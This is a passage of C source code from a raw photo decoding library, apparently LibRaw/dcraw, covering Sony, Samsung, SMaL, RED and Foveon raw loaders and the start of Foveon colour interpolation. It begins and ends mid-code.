#ifndef LIBRAW_NOTHREADS
#undef pad
#undef p
#endif
}
void CLASS sony_load_raw()
{
uchar head[40];
ushort *pixel;
unsigned i, key, row, col;
fseek (ifp, 200896, SEEK_SET);
fseek (ifp, (unsigned) fgetc(ifp)*4 - 1, SEEK_CUR);
order = 0x4d4d;
key = get4();
fseek (ifp, 164600, SEEK_SET);
fread (head, 1, 40, ifp);
sony_decrypt ((unsigned *) head, 10, 1, key);
for (i=26; i-- > 22; )
key = key << 8 | head[i];
fseek (ifp, data_offset, SEEK_SET);
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
pixel = raw_image + row*raw_width;
if (fread (pixel, 2, raw_width, ifp) < raw_width) derror();
sony_decrypt ((unsigned *) pixel, raw_width/2, !row, key);
for (col=0; col < raw_width; col++)
if ((pixel[col] = ntohs(pixel[col])) >> 14) derror();
}
maximum = 0x3ff0;
}
void CLASS sony_arw_load_raw()
{
ushort huff[32770];
static const ushort tab[18] =
{ 0xf11,0xf10,0xe0f,0xd0e,0xc0d,0xb0c,0xa0b,0x90a,0x809,
0x708,0x607,0x506,0x405,0x304,0x303,0x300,0x202,0x201 };
int i, c, n, col, row, sum=0;
huff[0] = 15;
for (n=i=0; i < 18; i++)
FORC(32768 >> (tab[i] >> 8)) huff[++n] = tab[i];
getbits(-1);
for (col = raw_width; col--; )
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (row=0; row < raw_height+1; row+=2) {
if (row == raw_height) row = 1;
if ((sum += ljpeg_diff(huff)) >> 12) derror();
if (row < height) RAW(row,col) = sum;
}
}
}
void CLASS sony_arw2_load_raw()
{
uchar *data, *dp;
ushort pix[16];
int row, col, val, max, min, imax, imin, sh, bit, i;
data = (uchar *) malloc (raw_width+1);
merror (data, "sony_arw2_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fread (data, 1, raw_width, ifp);
for (dp=data, col=0; col < raw_width-30; dp+=16) {
max = 0x7ff & (val = sget4(dp));
min = 0x7ff & val >> 11;
imax = 0x0f & val >> 22;
imin = 0x0f & val >> 26;
for (sh=0; sh < 4 && 0x80 << sh <= max-min; sh++);
#ifdef LIBRAW_LIBRARY_BUILD
/* flag checks if outside of loop */
if(! (imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_ALLFLAGS) // no flag set
|| (imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTATOVALUE)
)
{
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = max;
else if (i == imin) pix[i] = min;
else {
pix[i] = ((sget2(dp+(bit >> 3)) >> (bit & 7) & 0x7f) << sh) + min;
if (pix[i] > 0x7ff) pix[i] = 0x7ff;
bit += 7;
}
}
else if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_BASEONLY)
{
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = max;
else if (i == imin) pix[i] = min;
else pix[i]=0;
}
else if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTAONLY)
{
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = 0;
else if (i == imin) pix[i] = 0;
else {
pix[i] = ((sget2(dp+(bit >> 3)) >> (bit & 7) & 0x7f) << sh) + min;
if (pix[i] > 0x7ff) pix[i] = 0x7ff;
bit += 7;
}
}
else if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTAZEROBASE)
{
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = 0;
else if (i == imin) pix[i] = 0;
else {
pix[i] = ((sget2(dp+(bit >> 3)) >> (bit & 7) & 0x7f) << sh);
if (pix[i] > 0x7ff) pix[i] = 0x7ff;
bit += 7;
}
}
#else
/* unaltered dcraw processing */
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = max;
else if (i == imin) pix[i] = min;
else {
pix[i] = ((sget2(dp+(bit >> 3)) >> (bit & 7) & 0x7f) << sh) + min;
if (pix[i] > 0x7ff) pix[i] = 0x7ff;
bit += 7;
}
#endif
#ifdef LIBRAW_LIBRARY_BUILD
if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTATOVALUE)
{
for (i=0; i < 16; i++, col+=2)
{
unsigned slope = pix[i] < 1001? 2 : curve[pix[i]<<1]-curve[(pix[i]<<1)-2];
unsigned step = 1 << sh;
RAW(row,col)=curve[pix[i]<<1]>black+imgdata.params.sony_arw2_posterization_thr?
LIM(((slope*step*1000)/(curve[pix[i]<<1]-black)),0,10000):0;
}
}
else
{
for (i=0; i < 16; i++, col+=2)
RAW(row,col) = curve[pix[i] << 1];
}
#else
for (i=0; i < 16; i++, col+=2)
RAW(row,col) = curve[pix[i] << 1] >> 2;
#endif
col -= col & 1 ? 1:31;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (data);
throw;
}
if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTATOVALUE)
maximum=10000;
#endif
free (data);
}
void CLASS samsung_load_raw()
{
int row, col, c, i, dir, op[4], len[4];
#ifdef LIBRAW_LIBRARY_BUILD
if(raw_width> 32768 || raw_height > 32768) // definitely too much for old samsung
throw LIBRAW_EXCEPTION_IO_BADFILE;
#endif
unsigned maxpixels = raw_width*(raw_height+7);
order = 0x4949;
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fseek (ifp, strip_offset+row*4, SEEK_SET);
fseek (ifp, data_offset+get4(), SEEK_SET);
ph1_bits(-1);
FORC4 len[c] = row < 2 ? 7:4;
for (col=0; col < raw_width; col+=16) {
dir = ph1_bits(1);
FORC4 op[c] = ph1_bits(2);
FORC4 switch (op[c]) {
case 3: len[c] = ph1_bits(4); break;
case 2: len[c]--; break;
case 1: len[c]++;
}
for (c = 0; c < 16; c += 2)
{
i = len[((c & 1) << 1) | (c >> 3)];
unsigned idest = RAWINDEX(row, col + c);
unsigned isrc = (dir ? RAWINDEX(row + (~c | -2), col + c) : col ? RAWINDEX(row, col + (c | -2)) : 0);
if(idest < maxpixels && isrc < maxpixels) // less than zero is handled by unsigned conversion
RAW(row, col + c) = ((signed)ph1_bits(i) << (32 - i) >> (32 - i)) + (dir ? RAW(row + (~c | -2), col + c) : col ? RAW(row, col + (c | -2)) : 128);
else
derror();
if (c == 14)
c = -1;
}
}
}
for (row=0; row < raw_height-1; row+=2)
for (col=0; col < raw_width-1; col+=2)
SWAP (RAW(row,col+1), RAW(row+1,col));
}
void CLASS samsung2_load_raw()
{
static const ushort tab[14] =
{ 0x304,0x307,0x206,0x205,0x403,0x600,0x709,
0x80a,0x90b,0xa0c,0xa0d,0x501,0x408,0x402 };
ushort huff[1026], vpred[2][2] = {{0,0},{0,0}}, hpred[2];
int i, c, n, row, col, diff;
huff[0] = 10;
for (n=i=0; i < 14; i++)
FORC(1024 >> (tab[i] >> 8)) huff[++n] = tab[i];
getbits(-1);
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
diff = ljpeg_diff (huff);
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
RAW(row,col) = hpred[col & 1];
if (hpred[col & 1] >> tiff_bps) derror();
}
}
}
void CLASS samsung3_load_raw()
{
int opt, init, mag, pmode, row, tab, col, pred, diff, i, c;
ushort lent[3][2], len[4], *prow[2];
order = 0x4949;
fseek (ifp, 9, SEEK_CUR);
opt = fgetc(ifp);
init = (get2(),get2());
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fseek (ifp, (data_offset-ftell(ifp)) & 15, SEEK_CUR);
ph1_bits(-1);
mag = 0; pmode = 7;
FORC(6) ((ushort *)lent)[c] = row < 2 ? 7:4;
prow[ row & 1] = &RAW(row-1,1-((row & 1) << 1)); // green
prow[~row & 1] = &RAW(row-2,0); // red and blue
for (tab=0; tab+15 < raw_width; tab+=16) {
if (~opt & 4 && !(tab & 63)) {
i = ph1_bits(2);
mag = i < 3 ? mag-'2'+"204"[i] : ph1_bits(12);
}
if (opt & 2)
pmode = 7 - 4*ph1_bits(1);
else if (!ph1_bits(1))
pmode = ph1_bits(3);
if (opt & 1 || !ph1_bits(1)) {
FORC4 len[c] = ph1_bits(2);
FORC4 {
i = ((row & 1) << 1 | (c & 1)) % 3;
len[c] = len[c] < 3 ? lent[i][0]-'1'+"120"[len[c]] : ph1_bits(4);
lent[i][0] = lent[i][1];
lent[i][1] = len[c];
}
}
FORC(16) {
col = tab + (((c & 7) << 1)^(c >> 3)^(row & 1));
pred = (pmode == 7 || row < 2)
? (tab ? RAW(row,tab-2+(col & 1)) : init)
: (prow[col & 1][col-'4'+"0224468"[pmode]] +
prow[col & 1][col-'4'+"0244668"[pmode]] + 1) >> 1;
diff = ph1_bits (i = len[c >> 2]);
if (diff >> (i-1)) diff -= 1 << i;
diff = diff * (mag*2+1) + mag;
RAW(row,col) = pred + diff;
}
}
}
}
#define HOLE(row) ((holes >> (((row) - raw_height) & 7)) & 1)
/* Kudos to Rich Taylor for figuring out SMaL's compression algorithm. */
void CLASS smal_decode_segment (unsigned seg[2][2], int holes)
{
uchar hist[3][13] = {
{ 7, 7, 0, 0, 63, 55, 47, 39, 31, 23, 15, 7, 0 },
{ 7, 7, 0, 0, 63, 55, 47, 39, 31, 23, 15, 7, 0 },
{ 3, 3, 0, 0, 63, 47, 31, 15, 0 } };
int low, high=0xff, carry=0, nbits=8;
int pix, s, count, bin, next, i, sym[3];
uchar diff, pred[]={0,0};
ushort data=0, range=0;
fseek (ifp, seg[0][1]+1, SEEK_SET);
getbits(-1);
if (seg[1][0] > raw_width*raw_height)
seg[1][0] = raw_width*raw_height;
for (pix=seg[0][0]; pix < seg[1][0]; pix++) {
for (s=0; s < 3; s++) {
data = data << nbits | getbits(nbits);
if (carry < 0)
carry = (nbits += carry+1) < 1 ? nbits-1 : 0;
while (--nbits >= 0)
if ((data >> nbits & 0xff) == 0xff) break;
if (nbits > 0)
data = ((data & ((1 << (nbits-1)) - 1)) << 1) |
((data + (((data & (1 << (nbits-1)))) << 1)) & ((~0u) << nbits));
if (nbits >= 0) {
data += getbits(1);
carry = nbits - 8;
}
count = ((((data-range+1) & 0xffff) << 2) - 1) / (high >> 4);
for (bin=0; hist[s][bin+5] > count; bin++);
low = hist[s][bin+5] * (high >> 4) >> 2;
if (bin) high = hist[s][bin+4] * (high >> 4) >> 2;
high -= low;
for (nbits=0; high << nbits < 128; nbits++);
range = (range+low) << nbits;
high <<= nbits;
next = hist[s][1];
if (++hist[s][2] > hist[s][3]) {
next = (next+1) & hist[s][0];
hist[s][3] = (hist[s][next+4] - hist[s][next+5]) >> 2;
hist[s][2] = 1;
}
if (hist[s][hist[s][1]+4] - hist[s][hist[s][1]+5] > 1) {
if (bin < hist[s][1])
for (i=bin; i < hist[s][1]; i++) hist[s][i+5]--;
else if (next <= bin)
for (i=hist[s][1]; i < bin; i++) hist[s][i+5]++;
}
hist[s][1] = next;
sym[s] = bin;
}
diff = sym[2] << 5 | sym[1] << 2 | (sym[0] & 3);
if (sym[0] & 4)
diff = diff ? -diff : 0x80;
if (ftell(ifp) + 12 >= seg[1][1])
diff = 0;
#ifdef LIBRAW_LIBRARY_BUILD
if(pix>=raw_width*raw_height)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
raw_image[pix] = pred[pix & 1] += diff;
if (!(pix & 1) && HOLE(pix / raw_width)) pix += 2;
}
maximum = 0xff;
}
void CLASS smal_v6_load_raw()
{
unsigned seg[2][2];
fseek (ifp, 16, SEEK_SET);
seg[0][0] = 0;
seg[0][1] = get2();
seg[1][0] = raw_width * raw_height;
seg[1][1] = INT_MAX;
smal_decode_segment (seg, 0);
}
int CLASS median4 (int *p)
{
int min, max, sum, i;
min = max = sum = p[0];
for (i=1; i < 4; i++) {
sum += p[i];
if (min > p[i]) min = p[i];
if (max < p[i]) max = p[i];
}
return (sum - min - max) >> 1;
}
void CLASS fill_holes (int holes)
{
int row, col, val[4];
for (row=2; row < height-2; row++) {
if (!HOLE(row)) continue;
for (col=1; col < width-1; col+=4) {
val[0] = RAW(row-1,col-1);
val[1] = RAW(row-1,col+1);
val[2] = RAW(row+1,col-1);
val[3] = RAW(row+1,col+1);
RAW(row,col) = median4(val);
}
for (col=2; col < width-2; col+=4)
if (HOLE(row-2) || HOLE(row+2))
RAW(row,col) = (RAW(row,col-2) + RAW(row,col+2)) >> 1;
else {
val[0] = RAW(row,col-2);
val[1] = RAW(row,col+2);
val[2] = RAW(row-2,col);
val[3] = RAW(row+2,col);
RAW(row,col) = median4(val);
}
}
}
void CLASS smal_v9_load_raw()
{
unsigned seg[256][2], offset, nseg, holes, i;
fseek (ifp, 67, SEEK_SET);
offset = get4();
nseg = (uchar) fgetc(ifp);
fseek (ifp, offset, SEEK_SET);
for (i=0; i < nseg*2; i++)
((unsigned *)seg)[i] = get4() + data_offset*(i & 1);
fseek (ifp, 78, SEEK_SET);
holes = fgetc(ifp);
fseek (ifp, 88, SEEK_SET);
seg[nseg][0] = raw_height * raw_width;
seg[nseg][1] = get4() + data_offset;
for (i=0; i < nseg; i++)
smal_decode_segment (seg+i, holes);
if (holes) fill_holes (holes);
}
void CLASS redcine_load_raw()
{
#ifndef NO_JASPER
int c, row, col;
jas_stream_t *in;
jas_image_t *jimg;
jas_matrix_t *jmat;
jas_seqent_t *data;
ushort *img, *pix;
jas_init();
#ifndef LIBRAW_LIBRARY_BUILD
in = jas_stream_fopen (ifname, "rb");
#else
in = (jas_stream_t*)ifp->make_jas_stream();
if(!in)
throw LIBRAW_EXCEPTION_DECODE_JPEG2000;
#endif
jas_stream_seek (in, data_offset+20, SEEK_SET);
jimg = jas_image_decode (in, -1, 0);
#ifndef LIBRAW_LIBRARY_BUILD
if (!jimg) longjmp (failure, 3);
#else
if(!jimg)
{
jas_stream_close (in);
throw LIBRAW_EXCEPTION_DECODE_JPEG2000;
}
#endif
jmat = jas_matrix_create (height/2, width/2);
merror (jmat, "redcine_load_raw()");
img = (ushort *) calloc ((height+2), (width+2)*2);
merror (img, "redcine_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
bool fastexitflag = false;
try {
#endif
FORC4 {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
jas_image_readcmpt (jimg, c, 0, 0, width/2, height/2, jmat);
data = jas_matrix_getref (jmat, 0, 0);
for (row = c >> 1; row < height; row+=2)
for (col = c & 1; col < width; col+=2)
img[(row+1)*(width+2)+col+1] = data[(row/2)*(width/2)+col/2];
}
for (col=1; col <= width; col++) {
img[col] = img[2*(width+2)+col];
img[(height+1)*(width+2)+col] = img[(height-1)*(width+2)+col];
}
for (row=0; row < height+2; row++) {
img[row*(width+2)] = img[row*(width+2)+2];
img[(row+1)*(width+2)-1] = img[(row+1)*(width+2)-3];
}
for (row=1; row <= height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
pix = img + row*(width+2) + (col = 1 + (FC(row,1) & 1));
for ( ; col <= width; col+=2, pix+=2) {
c = (((pix[0] - 0x800) << 3) +
pix[-(width+2)] + pix[width+2] + pix[-1] + pix[1]) >> 2;
pix[0] = LIM(c,0,4095);
}
}
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col++)
RAW(row,col) = curve[img[(row+1)*(width+2)+col+1]];
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
fastexitflag=true;
}
#endif
free (img);
jas_matrix_destroy (jmat);
jas_image_destroy (jimg);
jas_stream_close (in);
#ifdef LIBRAW_LIBRARY_BUILD
if(fastexitflag)
throw LIBRAW_EXCEPTION_CANCELLED_BY_CALLBACK;
#endif
#endif
}
//@end COMMON
/* RESTRICTED code starts here */
void CLASS foveon_decoder (unsigned size, unsigned code)
{
static unsigned huff[1024];
struct decode *cur;
int i, len;
if (!code) {
for (i=0; i < size; i++)
huff[i] = get4();
memset (first_decode, 0, sizeof first_decode);
free_decode = first_decode;
}
cur = free_decode++;
if (free_decode > first_decode+2048) {
fprintf (stderr,_("%s: decoder table overflow\n"), ifname);
longjmp (failure, 2);
}
if (code)
for (i=0; i < size; i++)
if (huff[i] == code) {
cur->leaf = i;
return;
}
if ((len = code >> 27) > 26) return;
code = (len+1) << 27 | (code & 0x3ffffff) << 1;
cur->branch[0] = free_decode;
foveon_decoder (size, code);
cur->branch[1] = free_decode;
foveon_decoder (size, code+1);
}
void CLASS foveon_thumb()
{
unsigned bwide, row, col, bitbuf=0, bit=1, c, i;
char *buf;
struct decode *dindex;
short pred[3];
bwide = get4();
fprintf (ofp, "P6\n%d %d\n255\n", thumb_width, thumb_height);
if (bwide > 0) {
if (bwide < thumb_width*3) return;
buf = (char *) malloc (bwide);
merror (buf, "foveon_thumb()");
for (row=0; row < thumb_height; row++) {
fread (buf, 1, bwide, ifp);
fwrite (buf, 3, thumb_width, ofp);
}
free (buf);
return;
}
foveon_decoder (256, 0);
for (row=0; row < thumb_height; row++) {
memset (pred, 0, sizeof pred);
if (!bit) get4();
for (bit=col=0; col < thumb_width; col++)
FORC3 {
for (dindex=first_decode; dindex->branch[0]; ) {
if ((bit = (bit-1) & 31) == 31)
for (i=0; i < 4; i++)
bitbuf = (bitbuf << 8) + fgetc(ifp);
dindex = dindex->branch[bitbuf >> bit & 1];
}
pred[c] += dindex->leaf;
fputc (pred[c], ofp);
}
}
}
void CLASS foveon_sd_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
struct decode *dindex;
short diff[1024];
unsigned bitbuf=0;
int pred[3], row, col, bit=-1, c, i;
read_shorts ((ushort *) diff, 1024);
if (!load_flags) foveon_decoder (1024, 0);
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
memset (pred, 0, sizeof pred);
if (!bit && !load_flags && atoi(model+2) < 14) get4();
for (col=bit=0; col < width; col++) {
if (load_flags) {
bitbuf = get4();
FORC3 pred[2-c] += diff[bitbuf >> c*10 & 0x3ff];
}
else FORC3 {
for (dindex=first_decode; dindex->branch[0]; ) {
if ((bit = (bit-1) & 31) == 31)
for (i=0; i < 4; i++)
bitbuf = (bitbuf << 8) + fgetc(ifp);
dindex = dindex->branch[bitbuf >> bit & 1];
}
pred[c] += diff[dindex->leaf];
if (pred[c] >> 16 && ~pred[c] >> 16) derror();
}
FORC3 image[row*width+col][c] = pred[c];
}
}
}
void CLASS foveon_huff (ushort *huff)
{
int i, j, clen, code;
huff[0] = 8;
for (i=0; i < 13; i++) {
clen = getc(ifp);
code = getc(ifp);
for (j=0; j < 256 >> clen; )
huff[code+ ++j] = clen << 8 | i;
}
get2();
}
void CLASS foveon_dp_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
unsigned c, roff[4], row, col, diff;
ushort huff[512], vpred[2][2], hpred[2];
fseek (ifp, 8, SEEK_CUR);
foveon_huff (huff);
roff[0] = 48;
FORC3 roff[c+1] = -(-(roff[c] + get4()) & -16);
FORC3 {
fseek (ifp, data_offset+roff[c], SEEK_SET);
getbits(-1);
vpred[0][0] = vpred[0][1] = vpred[1][0] = vpred[1][1] = 512;
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col++) {
diff = ljpeg_diff(huff);
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
image[row*width+col][c] = hpred[col & 1];
}
}
}
}
void CLASS foveon_load_camf()
{
unsigned type, wide, high, i, j, row, col, diff;
ushort huff[258], vpred[2][2] = {{512,512},{512,512}}, hpred[2];
fseek (ifp, meta_offset, SEEK_SET);
type = get4(); get4(); get4();
wide = get4();
high = get4();
if (type == 2) {
fread (meta_data, 1, meta_length, ifp);
for (i=0; i < meta_length; i++) {
high = (high * 1597 + 51749) % 244944;
wide = high * (INT64) 301593171 >> 24;
meta_data[i] ^= ((((high << 8) - wide) >> 1) + wide) >> 17;
}
} else if (type == 4) {
free (meta_data);
meta_data = (char *) malloc (meta_length = wide*high*3/2);
merror (meta_data, "foveon_load_camf()");
foveon_huff (huff);
get4();
getbits(-1);
for (j=row=0; row < high; row++) {
for (col=0; col < wide; col++) {
diff = ljpeg_diff(huff);
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
if (col & 1) {
meta_data[j++] = hpred[0] >> 4;
meta_data[j++] = hpred[0] << 4 | hpred[1] >> 8;
meta_data[j++] = hpred[1];
}
}
}
}
#ifdef DCRAW_VERBOSE
else
fprintf (stderr,_("%s has unknown CAMF type %d.\n"), ifname, type);
#endif
}
const char * CLASS foveon_camf_param (const char *block, const char *param)
{
unsigned idx, num;
char *pos, *cp, *dp;
for (idx=0; idx < meta_length; idx += sget4(pos+8)) {
pos = meta_data + idx;
if (strncmp (pos, "CMb", 3)) break;
if (pos[3] != 'P') continue;
if (strcmp (block, pos+sget4(pos+12))) continue;
cp = pos + sget4(pos+16);
num = sget4(cp);
dp = pos + sget4(cp+4);
while (num--) {
cp += 8;
if (!strcmp (param, dp+sget4(cp)))
return dp+sget4(cp+4);
}
}
return 0;
}
void * CLASS foveon_camf_matrix (unsigned dim[3], const char *name)
{
unsigned i, idx, type, ndim, size, *mat;
char *pos, *cp, *dp;
double dsize;
for (idx=0; idx < meta_length; idx += sget4(pos+8)) {
pos = meta_data + idx;
if (strncmp (pos, "CMb", 3)) break;
if (pos[3] != 'M') continue;
if (strcmp (name, pos+sget4(pos+12))) continue;
dim[0] = dim[1] = dim[2] = 1;
cp = pos + sget4(pos+16);
type = sget4(cp);
if ((ndim = sget4(cp+4)) > 3) break;
dp = pos + sget4(cp+8);
for (i=ndim; i--; ) {
cp += 12;
dim[i] = sget4(cp);
}
if ((dsize = (double) dim[0]*dim[1]*dim[2]) > meta_length/4) break;
mat = (unsigned *) malloc ((size = dsize) * 4);
merror (mat, "foveon_camf_matrix()");
for (i=0; i < size; i++)
if (type && type != 6)
mat[i] = sget4(dp + i*4);
else
mat[i] = sget4(dp + i*2) & 0xffff;
return mat;
}
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: \"%s\" matrix not found!\n"), ifname, name);
#endif
return 0;
}
int CLASS foveon_fixed (void *ptr, int size, const char *name)
{
void *dp;
unsigned dim[3];
if (!name) return 0;
dp = foveon_camf_matrix (dim, name);
if (!dp) return 0;
memcpy (ptr, dp, size*4);
free (dp);
return 1;
}
float CLASS foveon_avg (short *pix, int range[2], float cfilt)
{
int i;
float val, min=FLT_MAX, max=-FLT_MAX, sum=0;
for (i=range[0]; i <= range[1]; i++) {
sum += val = pix[i*4] + (pix[i*4]-pix[(i-1)*4]) * cfilt;
if (min > val) min = val;
if (max < val) max = val;
}
if (range[1] - range[0] == 1) return sum/2;
return (sum - min - max) / (range[1] - range[0] - 1);
}
short * CLASS foveon_make_curve (double max, double mul, double filt)
{
short *curve;
unsigned i, size;
double x;
if (!filt) filt = 0.8;
size = 4*M_PI*max / filt;
if (size == UINT_MAX) size--;
curve = (short *) calloc (size+1, sizeof *curve);
merror (curve, "foveon_make_curve()");
curve[0] = size;
for (i=0; i < size; i++) {
x = i*filt/max/4;
curve[i+1] = (cos(x)+1)/2 * tanh(i*filt/mul) * mul + 0.5;
}
return curve;
}
void CLASS foveon_make_curves
(short **curvep, float dq[3], float div[3], float filt)
{
double mul[3], max=0;
int c;
FORC3 mul[c] = dq[c]/div[c];
FORC3 if (max < mul[c]) max = mul[c];
FORC3 curvep[c] = foveon_make_curve (max, mul[c], filt);
}
int CLASS foveon_apply_curve (short *curve, int i)
{
if (abs(i) >= curve[0]) return 0;
return i < 0 ? -curve[1-i] : curve[1+i];
}
#define image ((short (*)[4]) image)
void CLASS foveon_interpolate()
{
static const short hood[] = { -1,-1, -1,0, -1,1, 0,-1, 0,1, 1,-1, 1,0, 1,1 };
short *pix, prev[3], *curve[8], (*shrink)[3];
float cfilt=0, ddft[3][3][2], ppm[3][3][3];
float cam_xyz[3][3], correct[3][3], last[3][3], trans[3][3];
float chroma_dq[3], color_dq[3], diag[3][3], div[3];
float (*black)[3], (*sgain)[3], (*sgrow)[3];
float fsum[3], val, frow, num;
int row, col, c, i, j, diff, sgx, irow, sum, min, max, limit;
int dscr[2][2], dstb[4], (*smrow[7])[3], total[4], ipix[3];
int work[3][3], smlast, smred, smred_p=0, dev[3];
int satlev[3], keep[4], active[4];
unsigned dim[3], *badpix;
double dsum=0, trsum[3];
char str[128];
const char* cp;
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Foveon interpolation...\n"));
#endif
foveon_load_camf();
foveon_fixed (dscr, 4, "DarkShieldColRange");
foveon_fixed (ppm[0][0], 27, "PostPolyMatrix");
foveon_fixed (satlev, 3, "SaturationLevel");
foveon_fixed (keep, 4, "KeepImageArea");
foveon_fixed (active, 4, "ActiveImageArea");
foveon_fixed (chroma_dq, 3, "ChromaDQ");
foveon_fixed (color_dq, 3,
foveon_camf_param ("IncludeBlocks", "ColorDQ") ?
"ColorDQ" : "ColorDQCamRGB");
if (foveon_camf_param ("IncludeBlocks", "ColumnFilter"))
foveon_fixed (&cfilt, 1, "ColumnFilter");
memset (ddft, 0, sizeof ddft);
if (!foveon_camf_param ("IncludeBlocks", "DarkDrift")
|| !foveon_fixed (ddft[1][0], 12, "DarkDrift"))
for (i=0; i < 2; i++) {
foveon_fixed (dstb, 4, i ? "DarkShieldBottom":"DarkShieldTop");
for (row = dstb[1]; row <= dstb[3]; row++)
for (col = dstb[0]; col <= dstb[2]; col++)
FORC3 ddft[i+1][c][1] += (short) image[row*width+col][c];
FORC3 ddft[i+1][c][1] /= (dstb[3]-dstb[1]+1) * (dstb[2]-dstb[0]+1);
}
if (!(cp = foveon_camf_param ("WhiteBalanceIlluminants", model2)))
{
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: Invalid white balance \"%s\"\n"), ifname, model2);
#endif
return; }
foveon_fixed (cam_xyz, 9, cp);
foveon_fixed (correct, 9,
foveon_camf_param ("WhiteBalanceCorrections", model2));
memset (last, 0, sizeof last);
for (i=0; i < 3; i++)
for (j=0; j < 3; j++)
FORC3 last[i][j] += correct[i][c] * cam_xyz[c][j];
#define LAST(x,y) last[(i+x)%3][(c+y)%3]
for (i=0; i < 3; i++)
FORC3 diag[c][i] = LAST(1,1)*LAST(2,2) - LAST(1,2)*LAST(2,1);
#undef LAST
FORC3 div[c] = diag[c][0]*0.3127 + diag[c][1]*0.329 + diag[c][2]*0.3583;
sprintf (str, "%sRGBNeutral", model2);
if (foveon_camf_param ("IncludeBlocks", str))
foveon_fixed (div, 3, str);
num = 0;
FORC3 if (num < div[c]) num = div[c];
FORC3 div[c] /= num;
memset (trans, 0, sizeof trans);
for (i=0; i < 3; i++)
for (j=0; j < 3; j++)
FORC3 trans[i][j] += rgb_cam[i][c] * last[c][j] * div[j];
FORC3 trsum[c] = trans[c][0] + trans[c][1] + trans[c][2];
dsum = (6*trsum[0] + 11*trsum[1] + 3*trsum[2]) / 20;
for (i=0; i < 3; i++)
FORC3 last[i][c] = trans[i][c] * dsum / trsum[i];
memset (trans, 0, sizeof trans);
for (i=0; i < 3; i++)
for (j=0; j < 3; j++)
FORC3 trans[i][j] += (i==c ? 32 : -1) * last[c][j] / 30;
foveon_make_curves (curve, color_dq, div, cfilt);
FORC3 chroma_dq[c] /= 3;
foveon_make_curves (curve+3, chroma_dq, div, cfilt);
FORC3 dsum += chroma_dq[c] / div[c];
curve[6] = foveon_make_curve (dsum, dsum, cfilt);
curve[7] = foveon_make_curve (dsum*2, dsum*2, cfilt);
sgain = (float (*)[3]) foveon_camf_matrix (dim, "SpatialGain");
if (!sgain) return;
sgrow = (float (*)[3]) calloc (dim[1], sizeof *sgrow);
sgx = (width + dim[1]-2) / (dim[1]-1);
black = (float (*)[3]) calloc (height, sizeof *black);
for (row=0; row < height; row++) {
for (i=0; i < 6; i++)
((float *)ddft[0])[i] = ((float *)ddft[1])[i] +
row / (height-1.0) * (((float *)ddft[2])[i] - ((float *)ddft[1])[i]);
FORC3 black[row][c] =
( foveon_avg (image[row*width]+c, dscr[0], cfilt) +
foveon_avg (image[row*width]+c, dscr[1], cfilt) * 3
- ddft[0][c][0] ) / 4 - ddft[0][c][1];
}
memcpy (black, black+8, sizeof *black*8);
memcpy (black+height-11, black+height-22, 11*sizeof *black);
memcpy (last, black, sizeof last);
for (row=1; row < height-1; row++) {
FORC3 if (last[1][c] > last[0][c]) {
if (last[1][c] > last[2][c])
black[row][c] = (last[0][c] > last[2][c]) ? last[0][c]:last[2][c];
} else
if (last[1][c] < last[2][c])
black[row][c] = (last[0][c] < last[2][c]) ? last[0][c]:last[2][c];
memmove (last, last+1, 2*sizeof last[0]);
memcpy (last[2], black[row+1], sizeof last[2]);
}
FORC3 black[row][c] = (last[0][c] + last[1][c])/2;
FORC3 black[0][c] = (black[1][c] + black[3][c])/2;
val = 1 - exp(-1/24.0);
memcpy (fsum, black, sizeof fsum);
for (row=1; row < height; row++)
FORC3 fsum[c] += black[row][c] =
(black[row][c] - black[row-1][c])*val + black[row-1][c];
memcpy (last[0], black[height-1], sizeof last[0]);
FORC3 fsum[c] /= height;
for (row = height; row--; )
FORC3 last[0][c] = black[row][c] =
